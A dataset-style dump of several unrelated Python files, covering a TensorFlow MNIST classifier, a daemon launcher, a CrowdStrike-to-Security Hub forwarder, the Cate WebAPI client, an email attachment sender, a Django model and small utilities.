    initial_value = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(initial_value, name=name)
def bias_variable(shape, name):
    """Create a trainable bias tensor initialised to the constant 0.1."""
    initial_value = tf.constant(0.1, shape=shape)
    return tf.Variable(initial_value, name=name)
def conv2d(x, W):
    """2-D convolution of *x* with kernel *W*: stride 1, SAME padding."""
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
    """2x2 max-pooling with stride 2 and SAME padding (halves spatial dims)."""
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def whatisit(file, sess):
    """Print a 28x28 BMP as ASCII digits and classify it with the restored CNN.

    NOTE(review): relies on the module-level weight variables (W_conv1, b_conv1,
    ... W_fc2, b_fc2) created in the __main__ block; calling this before they
    exist raises NameError.
    """
    print("File name is %s" % file)
    data = pb.parse_bmp(file)
    # Show bmp data
    for i in range(len(data)):
        sys.stdout.write(str(int(data[i])))
        if (i+1) % 28 == 0:
            print("")
    # Predicting: rebuild the conv/pool/fc graph on this single image.
    d = np.array([data])
    x_image = tf.reshape(d, [-1, 28, 28, 1])
    h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
    h_pool1 = max_pool_2x2(h_conv1)
    h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
    h_pool2 = max_pool_2x2(h_conv2)
    h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
    h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
    # keep_prob of 1.0 disables dropout at inference time.
    h_fc1_drop = tf.nn.dropout(h_fc1, 1.0)
    y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    result = sess.run(y_conv)
    # Show result: raw logits, then the predicted digit.
    print(result)
    print(np.argmax(result, 1))
if __name__ == "__main__":
# Restore parameters
W = tf.Variable(tf.zeros([28*28, 10]), name="W")
b = tf.Variable(tf.zeros([10]), name="b")
W_conv1 = weight_variable([5, 5, 1, 32], name="W_conv1")
b_conv1 = bias_variable([32], name="b_conv1")
W_conv2 = weight_variable([5, 5, 32, 64], name="W_conv2")
b_conv2 = bias_variable([64], name="b_conv2")
W_fc1 = weight_variable([7 * 7 * 64, 1024], name="W_fc1")
b_fc1 = bias_variable([1024], name="b_fc1")
W_fc2 = weight_variable([1024, 10], name="W_fc2")
b_fc2 = bias_variable([10], name="b_fc2")
sess = tf.InteractiveSession()
saver = tf.train.Saver()
saver.restore(sess, 'param/neural.param')
# My data
whatisit("My_data/0.bmp", sess)
whatisit("My_data/1.bmp", sess)
whatisit("My_data/2.bmp", sess)
whatisit("My_data/3.bmp", sess)
whatisit("My_data/4.bmp", sess)
whatisit("My_data/5.bmp", sess)
whatisit("My_data/6.bmp", sess)
whatisit("My_data/7.bmp", sess)
whatisit("My_data/8.bmp", sess)
whatisit("My_data/9.bmp", sess)
|
991,423 | 72c5a0e2ccee849db3dc473298e59067f622e535 | #-*- coding:utf-8 -*-
#!/usr/bin/env python
import os
import sys
import datetime
import logging
import enviroment
from daemon import run_daemon
from time import sleep
# 启动真正的运行进程
def start_server_in_subprocess():
    """Run the HTTP server in the forked child, then exit with status 2.

    NOTE(review): `http.server` here is presumably a project-local module
    (the stdlib http.server has no start_http_server) -- verify.
    """
    import http.server as root_server
    logging.info('server start.')
    root_server.start_http_server()
    # Only reached once the (normally blocking) server loop returns.
    sys.exit(2)
def start_server():
    """Daemonize, fork a child running the HTTP server, and respawn it forever.

    The parent blocks in os.wait(); whenever the child dies it forks a
    replacement. (Python 2 `except OSError, e` syntax preserved.)
    """
    run_daemon()
    try:
        pid = os.fork()
    except OSError, e:
        logging.error('start http server is error.')
        os._exit(1)
    if pid == 0:
        # Child process: run the server and never fall through.
        start_server_in_subprocess()
        return
    while pid:
        # os.wait() blocks until any child process terminates.
        ret = os.wait()
        logging.error('Child process already stop, try to start')
        try:
            pid = os.fork()
            if pid == 0:
                start_server_in_subprocess()
                return
        except OSError, e:
            logging.error('start http server is error.')
            os._exit(1)
# 关闭所有进程
def stop_server():
    """Kill every process whose command line matches '<script> start'.

    NOTE(review): matches by grep over ps output, so it can also kill the
    grep itself or unrelated lookalike processes.
    """
    processname = sys.argv[0] + ' start'
    command = r'''ps -ef | grep "%s" | awk '{print $2}' | xargs kill -9''' % processname
    logging.info('exe command:%s', command)
    try:
        logging.info('exit the http server')
        ret = os.system(command)
    except OSError, e:
        logging.error('unknow error : %s',e)
# 入口函数,根据传入的参数做相关的操作
def entry():
    """Entry point: dispatch on argv[1] -- start | stop | restart."""
    if len(sys.argv) > 1:
        op = sys.argv[1]
        if op == 'start':
            start_server()
        elif op == 'restart':
            stop_server()
            # stop_server locates processes by "<name> start", so the restarted
            # process must be launched with the same "start" argument.
            command = "python %s start" % sys.argv[0]
            os.system(command)
        elif op == 'stop':
            stop_server()
        else:
            logging.error('unknow commont:<%s>, you should write start|stop|restart .',op)
    else:
        logging.error('unknow commont, you should write start|stop|restart .')
if __name__ == '__main__':
entry() |
991,424 | 0d5e4bbe3f782f1bf1a8db2e2dcd24e0d7cd1467 | import traceback
import os
import boto3
from botocore.exceptions import ClientError # , EndpointConnectionError
def handleRecord(decoded_line):
    """Process one Falcon detection record and forward it to Security Hub.

    Args:
        decoded_line: decoded detection payload (dict); enriched in place
            with vpc/subnet/image/eni/instance-name fields when the instance
            is confirmed.

    Returns:
        The Security Hub import response, or a dict with an "Error" key when
        the record could not be matched to an instance.
    """
    send = False
    # BUG FIX: send_result used to be unbound (UnboundLocalError) when the
    # confirmed instance had no network interfaces.
    send_result = {"Error": "Alert not processed."}
    cur_region = os.environ["AWS_REGION"]
    try:
        confirm = os.environ["CONFIRM_INSTANCES"]
    except KeyError:
        # Default to confirm the instance exists in the account (Non-MSSP)
        confirm = "True"
    if confirm.lower() != "false":
        if "instance_id" in decoded_line:
            region, instance = getInstance(decoded_line["instance_id"], decoded_line["detected_mac_address"])
            try:
                for iface in instance.network_interfaces:
                    decoded_line["vpc_id"] = instance.vpc_id
                    decoded_line["subnet_id"] = instance.subnet_id
                    decoded_line["image_id"] = instance.image_id
                    decoded_line["eni_id"] = iface.id
                    # Try and grab the instance name tag
                    try:
                        for tag in instance.tags:
                            if "name" in tag["Key"].lower():
                                decoded_line["instance_name"] = tag["Value"]
                    except (AttributeError, IndexError, KeyError):
                        decoded_line["instance_name"] = "Unnamed instance"
                    send = True
            except (ClientError, AttributeError):
                # BUG FIX: getInstance returns False when no region matched,
                # which raised an uncaught AttributeError here -- treat it the
                # same as a ClientError ("not our instance").
                i_id = decoded_line["instance_id"]
                # BUG FIX: the record key is "detected_mac_address" (see the
                # getInstance call above); "mac_address" raised KeyError.
                mac = decoded_line["detected_mac_address"]
                e_msg = f"Instance {i_id} with MAC address {mac} not found in regions searched. Alert not processed."
                send_result = {"Error": e_msg}
        else:
            e_msg = "Instance ID not provided. Alert not processed."
            send_result = {"Error": e_msg}
    else:
        # We are not confirming instances, so we cannot identify it's region. Use our reporting region instead.
        region = cur_region
        send = True
    if send:
        send_result = sendToSecurityHub(generateManifest(decoded_line, cur_region, region), cur_region)
    return send_result
def generateManifest(detection_event, region, det_region):
    """Translate a Falcon detection event into an AWS Security Hub finding.

    Args:
        detection_event: decoded Falcon detection payload (dict).
        region: reporting region, used for the product ARN lookup.
        det_region: region where the detected instance actually lives.

    Returns:
        The finding dict, or None when a mandatory field is missing.
    """
    manifest = {}
    # GovCloud uses a different partition and CrowdStrike product account.
    if "gov" in region:
        ARN = "arn:aws-us-gov:securityhub:{}:358431324613:product/crowdstrike/crowdstrike-falcon".format(region)
    else:
        ARN = "arn:aws:securityhub:{}:517716713836:product/crowdstrike/crowdstrike-falcon".format(region)
    try:
        manifest["SchemaVersion"] = "2018-10-08"
        manifest["ProductArn"] = f"{ARN}"
        accountID = boto3.client("sts").get_caller_identity().get('Account')
        manifest["AwsAccountId"] = accountID
        manifest["GeneratorId"] = detection_event["generator_id"]
        manifest["Types"] = detection_event["types"]
        manifest["CreatedAt"] = detection_event["created_at"]
        manifest["UpdatedAt"] = detection_event["updated_at"]
        manifest["RecordState"] = detection_event["record_state"]
        severityProduct = detection_event["severity"]
        # Normalised severity = product severity * 20 (assumes a 0-5 product
        # scale mapping onto Security Hub's 0-100 -- verify).
        severityNormalized = severityProduct * 20
        manifest["Severity"] = {"Product": severityProduct, "Normalized": severityNormalized}
        if "instance_id" in detection_event:
            manifest["Id"] = detection_event["instance_id"] + detection_event["detection_id"]
            manifest["Title"] = "Falcon Alert. Instance: %s" % detection_event["instance_id"]
            manifest["Resources"] = [{"Type": "AwsEc2Instance", "Id": detection_event["instance_id"], "Region": det_region}]
        else:
            manifest["Id"] = f"UnknownInstanceID:{detection_event['detection_id']}"
            manifest["Title"] = "Falcon Alert."
            manifest["Resources"] = [{"Type": "Other",
                                      "Id": f"UnknownInstanceID:{detection_event['detection_id']}",
                                      "Region": region
                                      }]
        desc = f"{detection_event['description']}"
        if "service_provider_account_id" in detection_event:
            aws_id = f"| AWS Account for alerting instance: {detection_event['service_provider_account_id']}"
        else:
            aws_id = ""
        description = f"{desc} {aws_id}"
        manifest["Description"] = description
        manifest["SourceUrl"] = detection_event["source_url"]
    except Exception:
        # Any missing mandatory field aborts the finding entirely.
        print("Could not translate info for event %s\n%s" % (detection_event["detection_id"], traceback.format_exc()))
        return
    try:
        # NOTE(review): this overwrites the Types value assigned above from
        # detection_event["types"] whenever tactic/technique are present --
        # confirm the overwrite is intentional.
        manifest["Types"] = ["Namespace: TTPs",
                             "Category: %s" % detection_event["tactic"],
                             "Classifier: %s" % detection_event["technique"]
                             ]
    except Exception:
        pass
    if "Process" in detection_event:
        manifest["Process"] = detection_event["Process"]
    if "Network" in detection_event:
        manifest["Network"] = detection_event["Network"]
    return manifest
def getInstance(instance_id, mac_address):
    """Search candidate regions for *instance_id* with a matching MAC address.

    Args:
        instance_id: EC2 instance id from the detection event.
        mac_address: MAC to confirm; case and :/- separators are ignored.

    Returns:
        (region, instance) -- *instance* is False when no region produced a
        confirmed match; *region* is then the last region tried (or None if
        none were).
    """
    # Instance IDs are unique to the region, not the account, so we have to check them all
    try:
        regions = os.environ["REGIONS"].split(",")
    except Exception:  # Prolly a KeyError
        ec2_client = boto3.client("ec2")
        regions = [region["RegionName"] for region in ec2_client.describe_regions()["Regions"]]
    # BUG FIX: both names used to be unbound (NameError at the return below)
    # when REGIONS was empty or every region raised ClientError.
    region = None
    ec2instance = False
    for region in regions:
        ec2 = boto3.resource("ec2", region_name=region)
        try:
            ec2instance = ec2.Instance(instance_id)
            found = False
            # Confirm the mac address matches
            for iface in ec2instance.network_interfaces:
                det_mac = mac_address.lower().replace(":", "").replace("-", "")
                ins_mac = iface.mac_address.lower().replace(":", "").replace("-", "")
                if det_mac == ins_mac:
                    found = True
            if found:
                break
            else:
                ec2instance = False
        except ClientError:
            # This is the wrong region for this instance
            continue
        except Exception:
            # Something untoward has occurred, throw the error in the log
            tb = traceback.format_exc()
            print(str(tb))
            continue
    return region, ec2instance
def sendToSecurityHub(manifest, region):
    """Submit *manifest* to Security Hub unless a finding with its Id exists.

    Returns the batch_import_findings response, or a message dict when the
    finding was already present (or the import failed and was only logged).
    """
    client = boto3.client('securityhub', region_name=region)
    check_response = {}
    found = False
    try:
        # De-duplication: any existing finding with the same Id means we
        # already submitted this alert.
        check_response = client.get_findings(Filters={'Id': [{'Value': manifest["Id"], 'Comparison': 'EQUALS'}]})
        for finding in check_response["Findings"]:
            found = True
    except Exception:
        # Lookup failures fall through to an import attempt.
        pass
    import_response = {"message": "Finding already submitted to Security Hub. Alert not processed."}
    if not found:
        try:
            import_response = client.batch_import_findings(Findings=[manifest])
        except ClientError as err:
            # Boto3 issue communicating with SH, throw the error in the log
            print(str(err))
        except Exception:
            # Unknown error / issue, log the result
            tb = traceback.format_exc()
            print(str(tb))
    return import_response
|
991,425 | 6b9c32517548ff907fc7dc4a70db3ddd55076c84 | def hello():
return "world"
def test_hello():
    """Smoke-test that hello() returns the expected greeting."""
    expected = "world"
    assert hello() == expected
|
991,426 | 433915870ed0252c02209e2da7c846a80dfc9394 | # The MIT License (MIT)
# Copyright (c) 2018 by the ESA CCI Toolbox development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import json
import requests
import urllib.parse
import urllib.request
from typing import List, Tuple, Optional, Any, Union
from tornado import gen, ioloop, websocket
from cate.core.common import default_user_agent
from cate.conf.defaults import WEBAPI_WORKSPACE_TIMEOUT
from cate.conf.defaults import WEBAPI_RESOURCE_TIMEOUT
from cate.conf.defaults import WEBAPI_PLOT_TIMEOUT
from cate.core.workspace import Workspace, OpKwArgs
from cate.core.wsmanag import WorkspaceManager
from cate.util.misc import encode_url_path
from cate.util.monitor import Monitor
from cate.util.safe import safe_eval
from cate.util.web.serviceinfo import join_address_and_port
__author__ = "Norman Fomferra (Brockmann Consult GmbH)"
class WebAPIWorkspaceManager(WorkspaceManager):
    """
    Implementation of the WorkspaceManager interface against
    a WebSocket using a JSON RPC protocol.
    It is currently used for the Cate CLI only.

    All public workspace operations are thin wrappers that forward the call
    to the remote WebAPI service via :meth:`_invoke_method` and convert JSON
    responses back into :class:`Workspace` objects.
    """
    def __init__(self, service_info: dict, conn_timeout: float = 5, rpc_timeout: float = 120):
        """Connect to the WebAPI service.

        :param service_info: dict with keys 'address' (falls back to
            'localhost') and 'port' (required).
        :param conn_timeout: seconds allowed for the WebSocket handshake
        :param rpc_timeout: default timeout for HTTP JSON fetches
        :raises ValueError: if service_info has no 'port'
        """
        address = service_info.get('address', None) or 'localhost'
        port = service_info.get('port', None)
        if not port:
            raise ValueError('missing "port" number in service_info argument')
        self.base_url = f'http://{join_address_and_port(address, port)}'
        self.ws_url = f'ws://{join_address_and_port(address, port)}/api'
        self.ws_client = WebSocketClient(self.ws_url)
        # Connection is established eagerly; failures surface here.
        self.ws_client.connect(conn_timeout)
        self.rpc_timeout = rpc_timeout
    def _url(self, path_pattern: str, path_args: dict = None, query_args: dict = None) -> str:
        # Build an absolute HTTP URL for the REST-style endpoints.
        return self.base_url + encode_url_path(path_pattern, path_args=path_args, query_args=query_args)
    def _invoke_method(self, method, params, timeout: float = None,
                       monitor: Monitor = Monitor.NONE):
        """Invoke a JSON-RPC method over the WebSocket.

        Raises a reconstructed exception if the RPC response carries an
        'error' member; otherwise returns the 'response' payload (may be None).
        """
        rpc_response = self.ws_client.invoke_method(method, params, timeout=timeout, monitor=monitor)
        error_info = rpc_response.get('error')
        if error_info:
            WebAPIWorkspaceManager._raise_error(error_info)
        return rpc_response.get('response')
    def _fetch_json(self, url, data=None, timeout: float = None):
        """POST to *url* and return the 'content' member of the JSON reply.

        Raises via :meth:`_raise_error` when the reply status is 'error'.
        """
        with requests.post(url,
                           data=data,
                           timeout=timeout or self.rpc_timeout,
                           headers={'User-Agent': default_user_agent()}) as response:
            json_response = response.json()
        status = json_response.get('status')
        if status == 'error':
            WebAPIWorkspaceManager._raise_error(json_response.get('error'))
        return json_response.get('content')
    @staticmethod
    def _raise_error(error_info):
        """Re-raise a service-side error as a local exception.

        Tries to resolve the exception type name reported by the service;
        falls back to RuntimeError when the type cannot be resolved or
        constructed with a single message argument.
        """
        exc_type = None
        if error_info:
            message = error_info.get('message') or ''
            error_ex_info = error_info.get('data')
            if error_ex_info:
                exc_type_name = error_ex_info.get('exception')
                if exc_type_name:
                    # noinspection PyBroadException
                    try:
                        # safe_eval restricts what names can be resolved here.
                        exc_type = safe_eval(exc_type_name)
                    except Exception:
                        pass
                # TODO (forman): find out how can we preserve traceback without adding it to the message string
                # tb = error_ex_info.get('traceback')
        else:
            message = 'Unknown error from WebAPI service.'
        exc = None
        if exc_type:
            # noinspection PyBroadException
            try:
                exc = exc_type(message)
            except Exception:
                pass
        if exc is None:
            exc = RuntimeError(message)
        raise exc
    # noinspection PyMethodMayBeStatic
    def _query(self, **kwargs):
        # Drop None-valued entries so they don't appear as query parameters.
        return {key: value for key, value in kwargs.items() if value is not None}
    def _post_data(self, **kwargs):
        # URL-encode non-None kwargs as a POST body; None when nothing to send.
        data = urllib.parse.urlencode(self._query(**kwargs))
        return data.encode() if data else None
    @classmethod
    def get_traceback_header(cls) -> str:
        """Return a decorated header line used when printing remote tracebacks."""
        traceback_title = 'Cate WebAPI service traceback'
        traceback_line = len(traceback_title) * '='
        return '\n' + traceback_line + '\n' + traceback_title + '\n' + traceback_line + '\n'
    @property
    def root_path(self) -> Optional[str]:
        # Remote manager has no local root directory.
        return None
    def resolve_path(self, path: str) -> str:
        # Paths are passed through unchanged; resolution happens server-side.
        return path
    def resolve_workspace_dir(self, path_or_name: str) -> str:
        # Same as resolve_path: the service resolves workspace directories.
        return path_or_name
    def get_open_workspaces(self) -> List[Workspace]:
        """Return all workspaces currently open in the service."""
        json_list = self._invoke_method("get_open_workspaces", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT)
        return [Workspace.from_json_dict(ws_json_dict) for ws_json_dict in json_list]
    def list_workspace_names(self) -> List[str]:
        """Return the names of all workspaces known to the service."""
        json_list = self._invoke_method("list_workspace_names", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT)
        return json_list
    def get_workspace(self, base_dir: str) -> Workspace:
        """Fetch the workspace stored at *base_dir*."""
        json_dict = self._invoke_method("get_workspace", dict(base_dir=base_dir), timeout=WEBAPI_WORKSPACE_TIMEOUT)
        return Workspace.from_json_dict(json_dict)
    def new_workspace(self, base_dir: str, description: str = None) -> Workspace:
        """Create a new workspace at *base_dir* with an optional description."""
        json_dict = self._invoke_method("new_workspace", dict(base_dir=base_dir, description=description),
                                        timeout=WEBAPI_WORKSPACE_TIMEOUT)
        return Workspace.from_json_dict(json_dict)
    def open_workspace(self, base_dir: str, monitor: Monitor = Monitor.NONE) -> Workspace:
        """Open the workspace at *base_dir*; progress is reported to *monitor*."""
        json_dict = self._invoke_method("open_workspace", dict(base_dir=base_dir),
                                        timeout=WEBAPI_WORKSPACE_TIMEOUT,
                                        monitor=monitor)
        return Workspace.from_json_dict(json_dict)
    def close_workspace(self, base_dir: str) -> None:
        """Close the workspace at *base_dir*."""
        self._invoke_method("close_workspace", dict(base_dir=base_dir), timeout=WEBAPI_WORKSPACE_TIMEOUT)
    def close_all_workspaces(self) -> None:
        """Close every open workspace."""
        self._invoke_method("close_all_workspaces", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT)
    def save_workspace_as(self, base_dir: str, to_dir: str, monitor: Monitor = Monitor.NONE) -> Workspace:
        """Save the workspace at *base_dir* into *to_dir*."""
        json_dict = self._invoke_method("save_workspace_as",
                                        dict(base_dir=base_dir, to_dir=to_dir),
                                        timeout=WEBAPI_WORKSPACE_TIMEOUT,
                                        monitor=monitor)
        return Workspace.from_json_dict(json_dict)
    def save_workspace(self, base_dir: str, monitor: Monitor = Monitor.NONE) -> Workspace:
        """Save the workspace at *base_dir* in place."""
        json_dict = self._invoke_method("save_workspace", dict(base_dir=base_dir),
                                        timeout=WEBAPI_WORKSPACE_TIMEOUT,
                                        monitor=monitor)
        return Workspace.from_json_dict(json_dict)
    def save_all_workspaces(self, monitor: Monitor = Monitor.NONE) -> None:
        """Save every open workspace."""
        self._invoke_method("save_all_workspaces", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT, monitor=monitor)
    def delete_workspace(self, base_dir: str, remove_completely: bool = False) -> None:
        """Delete the workspace; remove_completely also removes its files."""
        self._invoke_method("delete_workspace",
                            dict(base_dir=base_dir, remove_completely=remove_completely),
                            timeout=WEBAPI_WORKSPACE_TIMEOUT)
    def clean_workspace(self, base_dir: str) -> Workspace:
        """Remove all resources from the workspace at *base_dir*."""
        json_dict = self._invoke_method("clean_workspace", dict(base_dir=base_dir), timeout=WEBAPI_WORKSPACE_TIMEOUT)
        return Workspace.from_json_dict(json_dict)
    def run_op_in_workspace(self, base_dir: str, op_name: str, op_args: OpKwArgs,
                            monitor: Monitor = Monitor.NONE) -> Union[Any, None]:
        """Run operation *op_name* in the workspace and return its raw result."""
        return self._invoke_method("run_op_in_workspace",
                                   dict(base_dir=base_dir, op_name=op_name, op_args=op_args),
                                   timeout=WEBAPI_WORKSPACE_TIMEOUT,
                                   monitor=monitor)
    def delete_workspace_resource(self, base_dir: str, res_name: str) -> Workspace:
        """Delete resource *res_name* from the workspace."""
        json_dict = self._invoke_method("delete_workspace_resource",
                                        dict(base_dir=base_dir, res_name=res_name),
                                        timeout=WEBAPI_RESOURCE_TIMEOUT)
        return Workspace.from_json_dict(json_dict)
    def set_workspace_resource_persistence(self, base_dir: str, res_name: str, persistent: bool) -> Workspace:
        """Toggle whether resource *res_name* is persisted with the workspace."""
        json_dict = self._invoke_method("set_workspace_resource_persistence",
                                        dict(base_dir=base_dir, res_name=res_name, persistent=persistent),
                                        timeout=WEBAPI_RESOURCE_TIMEOUT)
        return Workspace.from_json_dict(json_dict)
    def set_workspace_resource(self,
                               base_dir: str,
                               op_name: str,
                               op_args: OpKwArgs,
                               res_name: Optional[str] = None,
                               overwrite: bool = False,
                               monitor: Monitor = Monitor.NONE) -> Tuple[Workspace, str]:
        """Assign the result of *op_name* to a (possibly auto-named) resource.

        Returns the updated workspace plus the actual resource name chosen
        by the service (second element of the JSON reply).
        """
        json_list = self._invoke_method("set_workspace_resource",
                                        dict(base_dir=base_dir, res_name=res_name, op_name=op_name,
                                             op_args=op_args, overwrite=overwrite),
                                        timeout=WEBAPI_RESOURCE_TIMEOUT,
                                        monitor=monitor)
        return Workspace.from_json_dict(json_list[0]), json_list[1]
    def rename_workspace_resource(self, base_dir: str,
                                  res_name: str, new_res_name: str) -> Workspace:
        """Rename resource *res_name* to *new_res_name*."""
        json_dict = self._invoke_method("rename_workspace_resource",
                                        dict(base_dir=base_dir, res_name=res_name, new_res_name=new_res_name),
                                        timeout=WEBAPI_RESOURCE_TIMEOUT)
        return Workspace.from_json_dict(json_dict)
    def write_workspace_resource(self, base_dir: str, res_name: str,
                                 file_path: str, format_name: str = None,
                                 monitor: Monitor = Monitor.NONE) -> None:
        """Write resource *res_name* to *file_path* in the given format.

        NOTE(review): *monitor* is accepted but not forwarded to the RPC call;
        confirm whether progress reporting was intended here.
        """
        self._invoke_method("write_workspace_resource",
                            dict(base_dir=base_dir, res_name=res_name,
                                 file_path=file_path, format_name=format_name),
                            timeout=WEBAPI_RESOURCE_TIMEOUT)
    def plot_workspace_resource(self, base_dir: str, res_name: str,
                                var_name: str = None, file_path: str = None,
                                monitor: Monitor = Monitor.NONE) -> None:
        """Plot a resource variable via the service's HTTP plot endpoint.

        Unlike the other operations this one goes over HTTP, not JSON-RPC.
        """
        url = self._url('/ws/res/plot/{base_dir}/{res_name}',
                        path_args=dict(base_dir=base_dir, res_name=res_name),
                        query_args=self._query(var_name=var_name, file_path=file_path))
        self._fetch_json(url, timeout=WEBAPI_RESOURCE_TIMEOUT + WEBAPI_PLOT_TIMEOUT)
    def print_workspace_resource(self, base_dir: str, res_name_or_expr: str = None,
                                 monitor: Monitor = Monitor.NONE) -> None:
        """Print a resource or the value of an expression server-side."""
        self._invoke_method("print_workspace_resource",
                            dict(base_dir=base_dir, res_name_or_expr=res_name_or_expr),
                            timeout=WEBAPI_RESOURCE_TIMEOUT,
                            monitor=monitor)
    def _create_scratch_dir(self, scratch_dir_name: str) -> str:
        # Scratch dirs are not applicable for the remote manager.
        return ''
    def _resolve_target_path(self, target_dir: str) -> str:
        # Target path resolution is delegated to the service; nothing local.
        return ''
class WebSocketClient(object):
    """Minimal JSON-RPC 2.0 client over a Tornado WebSocket connection."""
    def __init__(self, url):
        self.url = url
        self.connection = None
        # Ids are handed out sequentially, starting at 1.
        self.current_method_id = 1
    def connect(self, timeout: float):
        """Open the WebSocket connection, blocking for at most *timeout* seconds."""
        ioloop.IOLoop.current().run_sync(self._connect, timeout=timeout)
    def invoke_method(self, method, params, timeout, monitor: Monitor) -> dict:
        """Run one JSON-RPC round trip and return the decoded response dict."""
        request = self._new_rpc_request(method, params)
        def run_rpc() -> dict:
            return _do_json_rpc(self.connection, request, monitor)
        return ioloop.IOLoop.current().run_sync(run_rpc, timeout=timeout)
    def close(self):
        """Close the underlying connection, if one is open."""
        if self.connection is None:
            return
        self.connection.close()
        self.connection = None
    @gen.coroutine
    def _connect(self):
        # Coroutine: establish the WebSocket connection.
        self.connection = yield websocket.websocket_connect(self.url)
    def _new_rpc_request(self, method_name, method_params) -> dict:
        """Build a JSON-RPC 2.0 request envelope with a fresh id."""
        return {'jsonrpc': '2.0',
                'id': self._new_method_id(),
                'method': method_name,
                'params': method_params}
    def _new_method_id(self) -> int:
        """Return the next request id (monotonically increasing)."""
        method_id = self.current_method_id
        self.current_method_id = method_id + 1
        return method_id
@gen.coroutine
def _do_json_rpc(web_socket, rpc_request: dict, monitor: Monitor) -> dict:
    """Send *rpc_request* over *web_socket* and wait for the final response.

    Progress messages received before the final response are forwarded to
    *monitor* (cumulative 'worked' values are converted into increments).
    Returns the final JSON-RPC response dict, or an empty dict if *monitor*
    was cancelled before a response arrived.
    """
    web_socket.write_message(json.dumps(rpc_request))
    work_reported = None
    started = False
    # Fix: the original condition was 'while True and (...)'; the
    # 'True and' was redundant and obscured the real loop condition.
    while monitor is None or not monitor.is_cancelled():
        response_str = yield web_socket.read_message()
        rpc_response = json.loads(response_str)
        if 'progress' in rpc_response:
            if monitor:
                progress = rpc_response['progress']
                total = progress.get('total')
                label = progress.get('label')
                worked = progress.get('worked')
                msg = progress.get('message')
                if not started:
                    # First progress message opens the monitor.
                    monitor.start(label or "start", total_work=total)
                    started = True
                if started:
                    if worked:
                        if work_reported is None:
                            work_reported = 0.0
                        # Server reports cumulative work; monitor expects deltas.
                        work = worked - work_reported
                        work_reported = worked
                    else:
                        work = None
                    monitor.progress(work=work, msg=msg)
        else:
            # Non-progress message: this is the final RPC response.
            if monitor and started:
                monitor.done()
            return rpc_response
    return {}
|
991,427 | 5a64663eac9081e21b38069579274cae7cfedafc | # -*- coding: utf-8 -*-
# @Time : 2019/1/9 15:24
# @Author : Junee
# @FileName: 868二进制间距.py
# @Software : PyCharm
# Observing PEP 8 coding style
class Solution(object):
    def binaryGap(self, N):
        """Return the largest distance between consecutive 1-bits of N.

        :type N: int
        :rtype: int
        """
        # Fix: the original used list(str(bin(N))) — bin() already returns a
        # str and list() was unnecessary. Collect indices of set bits in the
        # binary representation ('0b' prefix stripped; only gaps between
        # consecutive ones matter, so any shared offset is irrelevant).
        ones = [i for i, bit in enumerate(bin(N)[2:]) if bit == '1']
        if len(ones) < 2:
            # Fewer than two 1-bits: no gap exists.
            return 0
        return max(b - a for a, b in zip(ones, ones[1:]))
991,428 | 88817ca6c6134942e50c4aff91738c514d92ecaa | import email, smtplib, ssl
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class SendMail():
    """Send an email with one file attachment through Gmail's SMTP-SSL server.

    ``content`` must supply: 'sender_email', 'receiver_email', 'subject',
    'body', 'password', 'directory' and 'filename'.
    """
    def __init__(self, content):
        # Create a multipart message and set headers
        message = MIMEMultipart()
        message["From"] = content['sender_email']
        message["To"] = content['receiver_email']
        message["Subject"] = content['subject']
        # Add body to email
        message.attach(MIMEText(content['body'], "plain"))
        directory = content['directory']
        filename = content['filename']
        # Open attachment file in binary mode
        with open(directory + filename, "rb") as attachment:
            # application/octet-stream lets clients download it as a raw file
            part = MIMEBase("application", "octet-stream")
            part.set_payload(attachment.read())
        # Encode file in ASCII characters to send by email
        encoders.encode_base64(part)
        # Fix: the header previously hard-coded a placeholder string instead
        # of interpolating the actual attachment file name.
        part.add_header(
            "Content-Disposition",
            f"attachment; filename= {filename}",
        )
        # Add attachment to message and convert message to string
        message.attach(part)
        text = message.as_string()
        # Log in to server using secure context and send email
        context = ssl.create_default_context()
        with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
            server.login(content['sender_email'], content['password'])
            server.sendmail(content['sender_email'], content['receiver_email'], text)
|
991,429 | b36ae566985cf16ac84f23c608db0de26c8506be | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class User_profile(models.Model):
    """One-to-one profile attached to the built-in auth ``User``."""
    # Deleted automatically together with its user (CASCADE).
    ezpdf_user = models.OneToOneField(User, on_delete=models.CASCADE)
    # External folder identifier (44 chars — presumably a cloud-storage
    # folder id; TODO confirm against the code that populates it).
    folder_id = models.CharField(max_length=44)
|
991,430 | 49f4b2fa5c0332989c09610b2f8ea5e8e14490f4 | from mworks.conduit import *
import time, sys
client = IPCClientConduit("python_bridge_plugin_conduit")
def hello_x(evt):
    """Print the code/data/time fields of an incoming event."""
    print("got evt")
